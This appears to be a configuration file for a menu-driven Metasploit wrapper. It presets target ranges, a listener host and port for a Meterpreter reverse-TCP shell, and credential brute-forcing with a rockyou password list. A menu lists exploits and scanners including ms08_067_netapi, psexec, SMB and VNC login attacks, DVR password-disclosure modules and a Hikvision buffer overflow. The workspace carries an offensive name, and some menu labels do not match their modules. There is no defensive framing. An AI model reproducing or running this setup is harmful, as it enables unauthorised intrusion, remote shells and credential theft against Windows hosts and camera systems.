RHOST='192.168.1.100'
RHOSTS='192.168.1.0/24'
LHOST='192.168.1.103'
LPORT='4433'
wspace='nazis'
payload='windows/meterpreter/reverse_tcp'
uusers='/wls/admins'
passfile='/wls/rockyou.txt'
BRUTEFORCE_SPEED='1'
BLANK_PASSWORDS='true'
STOP_ON_SUCCESS='true'



# Directories
# username files location
userDIR="/wls/"

# Password file location
passDIR="/wls/"

# nmap saves location
nmapPath='/media/SCANS/nmap/'


# Main Menu Items
# ActionX = msfconsole command
#   TextX = what is displayed in menu


mainMenuAction1='use exploit/windows/smb/ms08_067_netapi'
mainMenuText1='ms08_067_netapi'

mainMenuAction2='use exploit/windows/dcerpc/ms03_026_dcom'
mainMenuText2='ms03_026_dcom'

mainMenuAction3='use exploit/windows/smb/ms10_061_spoolss'
mainMenuText3='smb_lookupsid'

mainMenuAction4='auxiliary/scanner/smb/smb_lookupsid'
mainMenuText4='smb_lookupsid'

mainMenuAction5='use exploit/windows/local/ms10_015_kitrap0d'
mainMenuText5='ms10_015_kitrap0d'

mainMenuAction6='use exploit/multi/handler'
mainMenuText6='exploit/multi/handler'

mainMenuAction7=''
mainMenuText7=''

mainMenuAction8='use auxiliary/scanner/smb/smb_enumshares'
mainMenuText8='smb_enumshares'

mainMenuAction9='use auxiliary/scanner/smb/smb_enumusers'
mainMenuText9='smb_enumusers'

mainMenuAction10='use aauxiliary/scanner/smb/smb_enumusers_domain'
mainMenuText10='smb_enumusers_domain'

mainMenuAction11='use exploit/windows/smb/psexec'
mainMenuText11='psexec'

mainMenuAction12='use auxiliary/scanner/smb/smb_login'
mainMenuText12='smb_login'

mainMenuAction13='use auxiliary/scanner/vnc/vnc_login'
mainMenuText13='vnc_login'

mainMenuAction14='use auxiliary/gather/avtech744_dvr_accounts'
mainMenuText14='avtech744_dvr_accounts'

mainMenuAction15='use auxiliary/scanner/misc/cctv_dvr_login'
mainMenuText15='cctv_dvr_login'

mainMenuAction16='use auxiliary/scanner/misc/dvr_config_disclosure'
mainMenuText16='dvr_config_disclosure'

mainMenuAction17='use auxiliary/scanner/misc/raysharp_dvr_passwords'
mainMenuText17='raysharp_dvr_passwords'

mainMenuAction18='use exploit/linux/misc/hikvision_rtsp_bof'
mainMenuText18='hikvision_rtsp_bof'
